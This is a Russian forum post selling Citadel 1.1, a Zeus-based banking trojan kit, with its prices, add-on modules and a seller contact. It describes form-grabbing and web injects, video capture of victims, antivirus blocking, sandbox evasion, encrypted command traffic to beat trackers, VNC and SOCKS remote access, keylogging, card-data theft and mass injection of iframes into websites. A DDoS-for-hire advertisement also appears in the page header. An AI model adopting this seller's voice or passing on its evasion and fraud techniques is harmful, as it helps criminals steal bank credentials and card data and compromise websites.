Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Citadel 1.1 - FF/IE/Chrome Grabber + Video Recording & AntiTracker Protection

Автор aquabox , 18 Sep 2012 06:24

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
aquabox
Отправлено 18 September 2012 - 06:24

aquabox

    Бит

  • Members
  • 0 сообщений
Citadel 1.1 - FF/IE/Chrome Grabber + Video Recording & AntiTracker Protection
Изображение

Предлагаем вам достойное решение для создания и обновления вашего ботнета.
Мы не пытались изобрести велосипед или создать революционный продукт. Всего лишь доработали уже хорошо зарекомендовавший себя в работе Zeus, значительно расширив его функционал и адаптировав под современные условия выживания под новым именем. Софт писали для себя, в процессе родилась идея о создании "социального круга поддержки", об этом читайте ниже.
Изменения коснулись как непосредственно самого бота, так и веб-составляющей.
Никаких "красивых иконок" вы у нас не найдете. Вы платите исключительно за новый приведенный ниже функционал и мотивацию кодеров для выполнения поддержки продукта.

Список нововведений для бота:
[+] Фикс VNC бага на Vista/Windows 7. Теперь можно полноценно работать с Internet Explorer (напомню, была проблема с рендерингом IE)
[+] Поддержка Mozilla Firefox 7.0 (решена проблема, при которой не слались отчеты в последних версиях браузера)
[+] Крипто-защита (расшифровывающая тело в памяти).
[+] Редиректы DNS (не через hosts). Можно блокировать/редиректить любые URL'ы, не опасаясь, что их заметит эвристика. Например заблокировать AV-cервера или редиректить банк-пагу на другой хост.
!BONUS! Список URL'ов популярных антивирусных программ для блокирования идет в комплекте.
[+] Информация о версии сотфа в репорте. Высылает вам подробную версию браузера холдера вместе с отчетом. Помогает, при имитации настроек холдера.
[+] Дополнительный уровень защиты сервера от трекеров - Login Key.
[+] Механизм аутинтефикации при загрузке конфигов (нет прямых урлов). Дает полноценную защиту от устоявшихся трекеров.
[+] Поддержка граббера Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+] Поддержка инжектов Google Chrome. [Проверено на последней версии 15.x/16.x/17.x].
[+} Добавлено кеширование поиска функций, что ускоряет установку хуков Chrome.
[+] Добавлена возможность выполнения системных CMD команд при старте бота (секция CMDList) с отправкой репорта на сервер. К примеру, нужно вам чтобы при инсталле, отправлялся результат команды "ipconfig /all", или список всех доступных шар. Полезно, при анализе внутренней структуры компаний. (например, часто попадаются боты в локалке с именами ACCOUNTANT_PC, POS_SERV, DATABASE...)
[+] Добавлен механизм проверки сохранности хуков на некоторых Windows.
[+] Эвристический анализатор окружения со стоп листом для нежелательного ПО (значительно повышает скрытность),включены все популярные антивирусы.
[+] Исправлены мелкие баги.
[+] Видео граббер. Уникальная возможность следить за работой ваших инжектов "глазами холдерами", в конфиге указываются список сайтов и длина записи видео в секундах, при заходе на заданный линк, активируется видео-запись в формате .mkv. Рекомендуется настроить свой сервер для приема файлов 10-60МБ.
[+] Убрано удаление кукисов при инсталле, т.к это сбивает "fingerprint" холдера при работе с заливами.
[+] добавлена поддержка HTTP 1.0 и расширенных хидеров (например респонз не всегда выглядит как "HTTP/1.1 200 OK", бывает "HTTP/1.1 200 follow document", в данном случае после кода 200 идет несколько слов) применимо к браузерам Firexfox & Chrome
[+] Добавлен гейт генератор (на случай, если вы хотите разместить файлы на промежуточном хосте для редиректа).
[+] Полностью переделано шифрование (передача данных, запись логов/видео, загрузка конфигов и т.д) у Citadel, на смену устаревшему RC4 используемому в Zeus, пришел AES 128. Напомню, что RC4 дал асечку, когда массово начали выпускаться различные декрипторы конфигов/инжектов для Zeus, а хосты начали палиться в abuse.ch.
Теперь помимо встроенного RC4, который шифруется с вашей персональной сигнатурой, в софт также встроено AES шифрование, на выходе мы получаем защищеное AES128 обращение бот<->гейт. Никакие ZeusDecryptor'ы(ThreatExpert) и автоматизированый реверсинг не будут помехой для вашей комфортной работы на текущий момент (Jan 2012).
[+] Весь базовый функционал, оставшийся от зевса присутствует. Думаю, не стоит его писать здесь снова.
[+] Исправлена ошибка записи репортов у веб-фильтров в конфиге с параметром "!" (игнорирование), который должен был исключать все заданные ссылки, а вместо этого делал обратное и писал их в лог.
[+] Добавлен новый параметр-фильтр в config-файл, а именно функция отсылать или не отсылать c*****s на сервер.
Параметр статичного конфига disable_c*****s 0/1 указывает отключить ли граббинг куков (1 - отключить, 0 - включить).
Вручную, также, кукисы можно получить командой user_c*****s_get из админки, если очень нужны.
[+] Добавлена функция произвольного открытия страницы дефлотовым браузером пользователя на боте.
К примеру, если вам нужно накрутить какой-нибудь счетчик или статистику голосования или вы хотите получать доп.доход с вашего ботнета открывая страницы с шопами (а также: фарма, гемблинг, дроп-проекты и т.д..) отличный способ разрекламировать нужную страницу!
Новый параметр url_open <url>
[+] Новый вид фильтрации WebFilters в конфиг-файле при сборке.
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметры не комбинируются, т.е. следует указывать какой-то один из них.
[+] Добавлена модульная система в софт, что дает нам:
* Расширяемость и загрузку любого операционного функционала ботам, ориентированного для Citadel.
Все модули загружаются с сервера и распаковываются динамически в памяти, что исключает их детектирование.
Хранение и передача во внешнем мире исключительно в шифрованном виде.
Модули грузятся в целевые процесссы, поэтому весомо экономят память.
Большая управляемость - модули можно отключать через конфиг.
[+] Видео-граббер переделан на модульную основу. Теперь вес некриптованного билда <190 кб. Всегда.
[+] Добавлен новый параметр timer_modules (тайминги для загрузки модулей).
[+] Добавлена поддержка нового браузера Google Chrome 17, а также исправлен баг с обработкой Flash'a в нем.
[+] Добавлена поддержка макросов. Введены макросы: %BOTID%, %BOTNET%
* Можете вставлять в любой участок инжектов данные макросы и передавать данные на ваш сервер (АЗ/инжекты), передается имя бота и имя ботнета.
[+] Добавлены 4 команды управления модулями (включение/выключение, запрет/разрешение на скачивание).
[+] Добавлен новый параметр disable_httpgrabber 1/0 для Chrome: исключает обработку обычных HTTP (не HTTPS) запросов.
[+] Добавлена запись полного User-Agent в отчеты HTTP(S) граббера, позволяет клонировать холдерский UserAgent через любые утилиты типа CCTools.
[+] Добавлена запись разрешения экрана в отчеты HTTP(S) граббера, пример "Screen(w:h): 1600:900" - полезно при клонировании параметров холдера, многие банки на это обращают внимание.
[+] Изменен протокол отправки видео-файлов для снижения нагрузки на сервер (у некоторых были проблемы с нагрузкой на сервер и он сильно тормозил)
[+] Добавлена возможность отсылки jabber-уведомлений нескольким получателям в админке Citadel.
[+] Добавлена возможность указания нескольких url_config'ов (пути до основного конфига), раньше было так: если у вас недоступен основной конфиг в момент инсталла бота, то резервный никак не скачивался, теперь этой проблемы не будет и бот пытается стянуть конфиг с другого URL'a(можно вписать до 20 резервных).
[+] Исправлена ошибка в Google Chrome (17x) приводящая к зависанию подпроцесса, при открытии нескольких вкладок с инжектами.
[+] Добавлены новые команды:
- Получение информации об установленном ПО (список - компания|продукт|версия) на компьютере: info_get_firewall
- Получение информации об установленном антивирусе на компьютере: info_get_antivirus
- Получение информации об установленном фаерволе на компьютере: info_get_firewall
Информация идет в виде отдельного репорта для каждого бота. Скоро встроим массовую статистику по установленному софту в админку Citadel.
[+] Изменен алгоритм антиэмуляции для ряда АВ (не считается криптором, софт стал невидимым для нескольких проактивок).
[+] Исправлена проблема запуска под пользователем SYSTEM.
[+] Добавлена возможность особых Jabber-уведомлений, при обнаружении заданных ботов по маске (к примеру маска *corporate*, будет искать botid с таким совпадением), даже если они не прислали никаких логов, скрипт уведомит вас в Jabber-сообщении о появлении бота. Теперь вы не пропустите мимо глаз ценных ботов.
[+] В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!
[+] Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 37.1%, ваши боты будут иметь самый свежий и чистый билд.
[+] Переработана система отправки отчетов на сервер, в предыдущих версиях для каждого отчета происходила единичная отправка POST запроса на гейт, в новой схеме отчеты отправляются пачкой по несколько штук, это позволяет свести до минимума количество сессий на сервере и нагрузка на сервере становится минимальной, что позволяет выдерживать большое количество ботов онлайн.
[+] Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.
[+] Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
[+] Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.
[+] Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом.
[+] Реализована совместимость инжектов с UTF-8 (теперь в инжекты можно вставлять любые языки, такие как японский, китайский и т.д)
[+] Разработана крипт-панель в админке Citadel. Это раздел в админке, который позволяет вам обновлять ехе-файл ботам, прямо из веба. В любой момент, вы можете перезакачать нужный ехе-файл и боты его своевременно скачают. Ведется история загрузок в формате: Файл | Дата Загрузки | Оплачено(Y/N)
По поводу последнего пункта, мы разделили полномочия и создали отдельную категорию пользователей с правами "криптера" - эти пользователи имеют доступ к вашей панели по вашему желанию и единственная привилегия этих пользователей - возможность обновлять ехе-файл, при этом вы можете отмечать в таблице, оплачен конкретный крипт или нет.
Можно включить jabber-уведомления по результату проверки на scan4you.
[+] Добавленны полноэкранные скриншоты (Опция в конфиге - "@@").
[+] Улучшен механизм автоапдейтинга: если вы столкнулись с проблемой большой нагрузки на сервере при обновлении(либо боты не переходят на новую админку), то этот фикс исправляет эту ситуацию. Фикс включает в себя:
- Старые репорты от прошлой версии ехе удаляются при обновлении (tmp файл), дополнительная подстраховка.
- Тяжелые отчеты (видео и прочее файловые репорты) дополнительно проверяются на корректность и удаляются в случае проблем(например, если такой файл уже закачан)
- Изменено время инициализации апдейтинга, в результате чего исклчючен deadloc и не возможность дальнейшего апдейта при какой-либо ошибке файловой системы.
[+] Исправили проблему мусорных логов в админке: убрали полное логирование Flash-роликов (swf/flv) из логов и всего Facebook, потому что огромное количество мусора идет именно от них.
[+] Модуль "Качественная проверка WebSocks" теперь встроен в админку, никаких лишних скриптов. Показывает: страну, штат, город, хостнейм, аптайм и ping lag.
Возможность входа в этот раздел без пароля, для удобства когда нужен срочно сокс smile.gif
[+] Модуль "Парсер логов" теперь встроен в админку, никаких лишних скриптов. Интерфейс значительно улучшен, добавлена возможность создания "избранных доменов", "архивных логов" и возможность парсинга https или http доменов на выбор. Выстраивается визуальная таблица всех доменов, которые фигурируют в логах.
[+] Добавлен раздел "Заметки" в админку Citadel, что-то вроде онлайн блокнота. Адаптировали интерфейс админки для планшетов iPad/Galaxy Tab.
[+] Доработали модуль "VNC-админка", теперь он встроен напрямую в админку Citadel, никаких дополнительных скриптов. Все устанавливается 1 кликом. Много новых возможностей, а именно:
- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.
- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.
- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.
- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.
- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.
- Возможность любых уведомлений в несколько Jabber'ов сразу.
[+] Исправлена проблема цепочки хуков в Chrome.
[+] При запуске user_execute с флагом "-f" принудительно переводится в режим только апдейтинга ехе и не будет запущен как инсталятор.
[+] Оптимизирована работа гейта, что позволило снизить нагрузку. Упрощена работа инсталлятора админки, что позволяет установить все модули в 1 клик.
[+] Добавлена поддержка новой версии Chrome 18 [инжекты/формграббинг]
[+] Добавлена кнопка "Все отчеты бота" в админке, позволяет просмотреть начало и конец отчетов от конкретного бота.
[+] Исправлен баг с ручной командой dns_filter_add, теперь блокировка URL'ов работает корректно.
[+] Исправлен баг с отображением ехе-файлов на главной странице, удаленные ехе теперь исчезают автоматически.
[+] Исправлен баг с работой планировщика заданий scan4you, ежедневная проверка ехе-файлов работает корректно.
[+] Добавлена единая система CRON-работы, одно cron-задание управляет теперь всеми задачами: jabber-уведомления, проверка файлов, работа модулей и т.п.
[+] Добавлена возможность удаления видео из админки.
[+] Добавлена отсылка примечания к боту в Jabber в VNC-модуле.
[+] Обновлена GeoIP база (конец 2011 года).
[+] Последний домен из AdvancedConfigs срабатывает с задержкой, сделано с целью защиты ваших резервных URL'ов от автоматического граббинга ханипотами.
[+] Исправлена работа скрипта архивирования данных в zip в админке (fsarc.php)
[+] Настройки Jabber-аккаунта и всех параметров теперь вынесены в общие настройки.
[+] Теперь можно указывать пути в конфиге с httpS:// (неподписанные сертификаты проходят)
[+] Исправлен баг с регистрозависимостью в инжектах, теперь <BODY> и <body> одинаковые сущности. Все инжекты регистронезависимые.
[+] Добавлен онлайн просмотр скриншотов из админки. Скрины выстраиваются в ряд в порядке появления, легко переключаются клавишами вперед-назад, сортируются. Нет смысла больше скачивать картинки и смотреть по одной. Виртуальные клавиатуры/страницы видно последовательно.
[+] Добавлена история отстука, вы можете посмотреть статистику отстука вашего ботнета(активных,всего,процент) за неделю, две недели или месяц.
[+] Добавлена история версий софта, вы можете посмотреть статистику по обновлениям Citadel в вашем ботнете. Будете знать сколько ботов перешло на новую версию, а сколько осталось на старой. Рисуется диаграмма.
[+] Возможность поиска логов, только по ботам, которые находятся в онлайне.
[+] Возможность поиска логов по нескольким кейвордам сразу, а также можн их сохранить как алиас и не вводить при следущем поиске заново, а просто выбрать из списка.
[+] Добавлена кнопка "C*****s" в контекстное меню по ботам, которая позволяет оперативно вывести все C*****s бота, если вы их не отключали. Экономит время.
[+] Интегрирована функция экспорта FTP-аккаунтов в API, полезно, если используете сторонний софт класса FTP-Iframer, позволяет вывести в plain-text/xml/php формате ftp-акки по нужной дате.
[+] Добавлена кнопка "Whois" в просмотре отчета, позволяет одним кликом получить всю информацию по IP-адресу отчета.
[+] Добавлена функция комментария к боту при просмотре отчета, а также времени, когда бот последний раз был онлайн. Комментарий подсвечивается при поиске в логах.
[+] Создан новый раздел "Избранные отчеты", который позволяет сохранить быструю ссылку на нужный вам отчет + комментарий к ниму. К примеру, если вы встретили интересный аккаунт, нажимаете "добавить в избранное" и отчет будет виден в отдельном разделе, с автоматическим Whois'ом данных и вашим комментарием. Сохраняйте акки не отходя от кассы.
[+] Добавлен антиэмулятор, который позволяет защитить ваш ботнет от реверсинга и попадания в трекеры. Если при запуске, билд детектит что он был запущен в виртуальной машине или песочнице CWSandbox, VMware, Virtualbox, Sandbox он начинает вести себя по-другому и ваш ботнет останется незамеченным. Подробности не раскрываются, т.к анонс находится в паблике и технология очень хитрая.
Из минусов: не сможете протестировать работу в Vmware, придется делать это на реальном ПК или дедике. Опция antiemulation_enable 1/0 вынесена в конфиг.
[+] Добавлено отображение статуса бота "Online/Offline" при просмотре отчета.
[+] Одна из самых главных фич: предпросмотр отчета при поиске логов. Не нужно больше открывать 200 окон в браузере, чтобы просмотреть каждый отчет и каждую ссылку. Теперь можно легко нажав на один отчет сделать предпросмотр, а если отчет будет интересен, то просмотреть полную версию.
Поддерживается быстрое переключение между отчетами клавишами назад-вперед-ESC.
[+] Обновлён скрипт cronjob очистки старых скриптов(команд). Теперь должен у всех работать без багов.
[+] Добавлена в контекстное меню опция "Скриншоты бота"
[+] Модуль VNC-админки: добавлена сортировка по дате последнего соединения / ОС (К примеру, если нужно только WinXP).
[+] Модуль парсер логов: добавлена сортировка по домену / количеству отчётов в порядке убывания.
[+] Модуль FTP-ифреймер: исправлен баг с "умным" ифреймингом, когда кавычки в iframe-коде экранировались. Текущим владельцам, рекомендуется перезалить скрипт-прокладку.
[+] Поскольку предыдущий алгоритм шифрования был взломан спустя несколько месяцев, из-за этого некоторые клиенты попадали в ZeusTracker. Мы разработали и внедрили новый алгоритм шифрования на основе модифицированного RC4. В шифровании используется особый ключ, известный только клиенту. что требует его наличия для расшифровки. Поскольку у каждого клиента свой индвидуальный ключ, теперь от одного клиента не будут страдать все остальные. Если попал один, другие будут от этого защищены. Сейчас мы полностью изолированы от автоматического анализа билдов. В итоге получаем 2 уровня авторизации-защиты бота от трекеров.
[+] Сделали подрезание опции X-Frame-Options в HTTP Header'ах, т.к она может мешать некоторым инжектам в работе (отвечает за фреймы на странице).
[+] Проделана огромная работа для корректного формграббинга/инжектинга в Chrome 19 (19.0.1084.52m).
[+] Ускорена работа на больших ботнетах админ.интерфейса + гейта засчет оптимизации функционала GeoIP-базы.
[+] Сделано возможное удаление .sol файлов при установке билда.
[+] Добавлен граббинг Accept-Language, Accept-Encoding в отчетах.
[+] Полностью измененый интерфейс веб-админки, user-friendly.

Изображение
Рис 1. Главное окно билдера (Full Screen# hxxp://img405.imageshack.us/img405/2131/2812.png)

Изображение
Рис 2. Главное окно веб-панели. (Full Screen# hxxp://img851.imageshack.us/img851/4718/cpscreen.png)

Про живучесть ботов ничего не скажем, увидите все сами. Благодарность принимаем в виде LR-знаков

Это базовая комплектация cборки. Стоимость $2899.00

Важное замечание:
Наш софт НЕ работает на русскоязычных системах, если обнаруживается русская или украинская раскладка - софт дает отказ в работе. Данное введение сделано в целях борьбы с СНГ загрузками. Относитесь к этому как хотите, для нас это табу.
Если хотите протестировать работу и разрабатывать инжекты - ставьте англоязычную систему, ссылки на образ + VMWare мы даем, чтобы сэкономить ваше время на поиск.

ДОПОЛНИТЕЛЬНЫЕ МОДУЛИ:

Список нововведений для веб-админки (отдельные модули):
[+] Реализована полноценная VNC-админка для работы с ботами.
Теперь вы можете:
- Собирать нужные вам конторы и акки в отдельную БД, в отдельный скрипт. В нем есть удобный просмотр записей, можно смотреть список онлайн-ботов и данные по пришедшим аккам.
- Создавать VNC-соединения в 2 клика с любым ботом.
- Просмотр статистики по живым/мертвым аккам(по ботам).
- Редактирования/изменений примечаний к пришедшим аккаунтам.
- Автоматические jabber-уведомления о новых поступлениях, либо, если бот появился в онлайне. Вам приходит уже готовый IP:PORT в жаббер, для соединения по ВНЦ протоколу.
- Возможность сортировки ботов по online/used/unused статусу.
- Указать BotID и VNC-соединение автоматически установится, как только бот появится в онлайне.
- Возможность работы с API, вы передаете BotID или IP-адрес скрипту, к примеру через инжект, а он устанавливает VNC/BackConnect Socks-соединение, присылая данные для подключения вам в Jabber. Можно вызывать скрипт в любой момент времени, применимо к АЗ.
- Напротив каждого отчета в разделе "Поиск в базе данных" появилось 4 кнопки: "Добавить в избранное", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"
- AutoConnect VNC при включенной опции, бот будет устанавливать vnc-соединение при каждом выходе в онлайн, пока вы не отключите это.
- AutoConnect BC Socks при включенной опции, бот будет устанавливать backconnect socks соединение при каждом выходе в онлайн, остальные опции создают разовый коннект.
- Появилась возможность создавать автоматически VNC/BC SOCKS-соединение как только от бота пришел нужный аккаунт по URL-маске, разбираем горячие пирожки.
- Напротив каждого аккаунта по URL-маске пишется дата последнего входа в этот акк (last login), теперь вам не надо чекать аккаунты на активность - за вас это сделают скрипты.
- Возможность любых уведомлений в несколько Jabber'ов сразу.
Стоимость $495.00


[+] Модуль качественной проверки Socks на валидность.
Возможность указать несколько БД разных ботнетов. Выдает 99,9% валидность соксов, засчет проверки через веб-серфинг.
Стоимость: $49.00

[+] Модуль MiniAV
Позволяет чистить ПК бота от чужой малвари, модуль срабатывает каждые 4 часа и удаляет все Zeus-модификации из системы, такие как Zeus1,2,Ice9 и т.п. Живучесть вашего билда поползет вверх в несколько раз, рекомендовано тем, кто встречал у себя в логах чужие гейты и использует трафик с бирж. В ближайшее время будут добавлены сигнатуры для удаления фейкав и подмены выдачи.
Стоимость: $200

[+] Модуль авто-крипта ехе-файлов.
Временно снят с продажи.

[+] Модуль парсера логов.
Наверное, многие сталкивались с проблемой, когда ботнетов становилось много, а логов еще больше. С текущим уровнем поиска данных по БД - это отнимает очень много времени.
Мы разработали скрипт, который позволяет включить в список несколько БД сразу и вывести вам список всех встречающихся http/https линков, а также данных по ним.
Присутствует возможность кеширования, а также заметок, для вашего удобства.
Стоимость: $295.00

[+] Модуль "CardSwipe".
Позволяет грабить из HTTPS/WinSocket карты и дампы и присылает их как отдельный отчет, которые вы можете отдельно найти.
Поиск осуществляется методом анализа трафика по алгоритму LUHN10. Погрешность - 25%
Цена модуля: $250 LR

[+] Автоматический ифреймер FTP-акков с логов:
- Автоматическая обработка всех пришедних FTP-акков в логи, а также возможность ручного запуска в нужное время.
- Всю работу выполняет скрипт-прокладка, заливаете ее на любой хост и работа начинается. Админ-интерфейс и прокладка общаются с собой по HTTP, посредством cron'a.
- Создана фаза самотестирования, проверяет подходит ли прокладка и все ли настройки правильно выставлены.
- CRON-система каждую минуту спрашивает ифреймер как у него дела: сколько заданий выполняется, сколько в очереди, сколько готово. Если есть аккаунты с которыми он уже закончил — они вытаскиваются и сохраняются. На ифреймере эти акки удаляются для экономии памяти.
- Предусмотрен механизм защиты от зависания ифреймера на сложных FTP-акков (с такой проблемой вы наверное сталкивались, когда скрипт останавливался и ничего не происходило, даже после перезапуска)
- Возможность задавания глубины ифрейминга (от 1 до 50 уровня), иначе говоря сколько папок внутри подпапок мы проходим.
- Возможность задавания масок файлов для работы, а также списка игнорирования.
- Несколько режимов: умный(не повреждает PHP/JS/ASP скрипты) , запись в конец, перезапись, только проверка на валидность
- Реализована проверка на дубли.
- Замена старого ифрейм-кода новым. Если изменился HTML-код — он не тупо добавится, а заменит собой старый.
- Опция "ифреймить только вчерашние акки". Даст сутки на то чтобы убрать из списка нужные вам FTP.
- Опция: реифрейминг аккаунтов спустя N дней. Каждый аккаунт спустя N дней будет обработан заново.
- Удобная и подробная статистика.
- Из минусов: низкая скорость работы, за неделю, в среднем обрабатывается не более 3000 FTP-аккаунтов.
Полное описание предоставляется в мануале, после приобретения.
Стоимость модуля: $1000.00

[+] Дубль-клинер

Скрипт позволяет очищать логи бота от дублей HTTP/HTTPS/FTP/POP3 отчетов.
Нагрузка на БД минимальная, хорошо работает в паре с модулем "Веб-парсер логов".
Отключается и включается в настройках админки.
Выгода: быстрее работает поиск по базе данных, база занимает меньший размер.
Стоимость модуля: $90

[+] Система защиты GeoIP

Комплект скриптов позволяет спрятать ваш конфиг,ехе и гейт от ненужных вам стран, при запросе нежелательные страны и боты будут получать 404 ответ.
Хорошо помогает для защиты от трекеров и реверсеров. Включается и отключается в настройках.
Из минусов: способен выдержать только маленькие (до 2000 ботов онлайн) ботнеты, поскольку PHP не расчитан на такую тяжелую и грязную работу.
Бюджетный вариант от абуз. Рекомендуется использовать только для маленьких узконаправленных VIP-ботнетах, с целью перевода ценных ботов на особый ботнет.
Цена: $380

[+] Кейлоггер

По запросам наших клиентов в СРМ, переделали модуль для перехвата нажитых клавиш (унаследован от зевса).
Модуль позволяет перехватывать отдельно-взятые приложения и посылать данные в админку как отдельные отчеты.
К примеру, вам нужно перехватить нажатые клавиши процесса "calc.exe", вы вводите название процесса в конфиг и все данные по нему будут приходить в админку.
Эффективно при работе с банковским софтом(+java), который ставится на PC холдера или покерным софтом.
Цена: $300

Все модули можно приобрести только при покупке базовой комплектации, отдельно они не продаются. С покупкой модуля, вы получаете право на дальнейшие обновления и поддержку данного модуля с нашей стороны.

VIP Полный комплект: $5958.00

В РАЗРАБОТКЕ:[*] Полноценный поиск & отсылка файлов по жесткому диску, список масок задается в конфиге. Например "passwords*.txt"

СЕРВИС & СОЦИАЛЬНЫЙ КРУГ:

Не секрет, что продукты в нашей нише, без поддержки со стороны разработчиков - это кусок хлама на жестком диске.
Поэтому продукт должен развиваться с учетом пожеланий наших клиентов, одна проблема - вы наверное сталкивались с игнором разработчиков в IM, потому что клиентов много, а разработчик один
Время - деньги, мы сделали для вас специальную систему, подобную социальной сети для наших клиентов.
Citadel CRM Store позволяет вам принимать участие в развитие продукта, а именно:
- Сообщать о баг-репортах и найденых ошибках в софте, все тикеты рассматриваются тех.поддержкой и вы своевременно получите ответ по возникшему вопросу, не надо больше доставать автора в icq/jabber'e.
- Каждый клиент имеет право создавать неограниченое количество заявок внутри системы, в которой он может выдвинуть предложение на создание нового модуля/доработки, который ему необходим в функционале софта. Каждая такая заявка, может быть как публичной так и приватной(доступной только вам)
- Каждый клиент имеет право голосовать за выдвинутую другим мембером идею и предлагать свою цену за реализацую данной доработки/модуля. По окончанию голосования, принимается решение разработчиками: делать данный модуль или нет, в зависимости от результата голосования среди клиентов.
- Каждый клиент имеет право комментировать любые заявки и общаться с другими мемберами, теперь вам будет интересно найти партнеров и единомышленников, а также принимать активное участие в дискуссии совместно с разработчиками.
- Вы можете видеть все стадии процесса создания модуля, если он утвержден мемберами. Мы своевременно обновляем статус и сроки у заявки.
- Вы можете вносить предоплату, если модуль был утвержден (50%), после вноса предоплаты мемберами, данный проект начинает двигаться вперед, т.к сумма выплачивается напрямую кодерам и никакой лени или бездействия вы с нами не найдете. Все прозрачно: каждый этап разработки подробно отображается.
- Удобные уведомления в jabber о новых комментариях или новых созданных заявках.
Вы по достоинству оцените новый формат работы!

Покупая базовую комплектацию, ежемесячно взымается арендная плата $125(можно оплатить на несколько месяцев вперед), что входит в эту плату:
- Нам интересно работать с нашими клиентами. На форумах часто старательно пишут что "мы поддерживаем продукт... блабла" а в итоге получается что обновления выходят раз в три месяца или вообще автор пропадает с концами. Проблема в мотивации авторов. Вы поддерживаете нас - мы поддерживаем вас. Все просто.
- Вы получаете ежемесячное обновление билдера (в 20 числах), которое включает обновленную защиту от антивирусов (шифрование тела бота, эвристический анализ перед инжектом в процессы).
- Вы получаете доступ в CRM: право инициативы на создания новых доработок, улучшений, право голоса за другие проекты и возможность общаться с другими мемберами в Citadel CRM Store.
- Поддержку с нашей стороны: ответы на ваши вопросы(через тикеты), помощь в установке и рекомендации к использованию. Запрещено передавать ваш персональный аккаунт в CRM кому-либо еще.
- В ближайших планах подключить к CRM системе веб-программистов, занимающихся исключительно инжектами (в т.ч написание АЗ). Наши клиенты смогут создавать ТЗ внутри системы, объявлять сроки и стоимость - а кодеры браться за выполнение поставленной задачи. Если вы качественно пишите инжекты - обращайтесь к нам, обсудим.
Изображение
Рис 4. Citadel CRM Store (Full Screen# hxxp://img819.imageshack.us/img819/2624/democrmscreen.png)

Демо-доступ по запросу (выдается в течении 24 часов).
Билдер идет с привязкой к вашему ПК, можете создавать неограниченое количество доменов.
Оплата исключительноИзображение  (Быстро обменять WM-LR можно на форумах типа mmgp.ru). Webmoney не принимаем.

Чтобы сэкономить ваше и наше время, не надо писать "ты тут?" и т.п
Скидывайте ваш запрос в формате:
"Хочу приобрести базовую комплектацию, а также модули VNC, автокрипт и сокс. Сколько будет стоить со скидкой  ? "

Jabber: aquab0x@lugmen.org.ar (ежедневно с 17.30 до 02.30;сб, вс - выходной, можете писать в оффлайн.Все заявки и вопросы будут обработаны в понедельник.)

Добавлено через 1 минуту

Список выполненых работ по софту за последние 10 дней:

+ добавлена поддержка HTTP 1.0 и расширенных хидеров (например респонз не всегда выглядит как "HTTP/1.1 200 OK", бывает "HTTP/1.1 200 follow document", в данном случае после кода 200 идет несколько слов) применимо FIREFOX и CHROME
+ Добавлен обход AVG
+ добавлен гейт генератор (на случай, если вы хотите разместить файлы на промежуточном хосте для редиректа).
+ исправлена запись видео на разрешениях не равных 16:9 (1366х768 не чистый 16:9)
+ улучшен перехват соединений в Chrome (не всегда срабатывали инжекты если соединение не было закрыто после первого инжекта)

Добавлено через 1 минуту

Список проделанных изменений в софте на 25 января 2012 года:

